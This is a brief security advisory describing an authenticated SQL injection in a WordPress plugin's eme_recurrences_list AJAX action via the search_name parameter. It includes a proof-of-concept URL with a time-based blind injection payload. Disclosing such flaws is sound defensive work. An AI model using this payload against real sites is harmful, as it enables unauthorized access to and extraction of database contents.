The plugin does not properly sanitise and escape the search_name parameter before using it in a SQL statement via the eme_recurrences_list AJAX action, leading to a SQL injection exploitable by any authenticated users, such as subscriber
Open the URL below while being on the blog as subscriber user
https://example.com/wp-admin/admin-ajax.php?action=eme_recurrences_list&search_name=1'{+}AND{+}(SELECT+1+FROM+(SELECT(SLEEP(0.5)))a)-{-}+{-}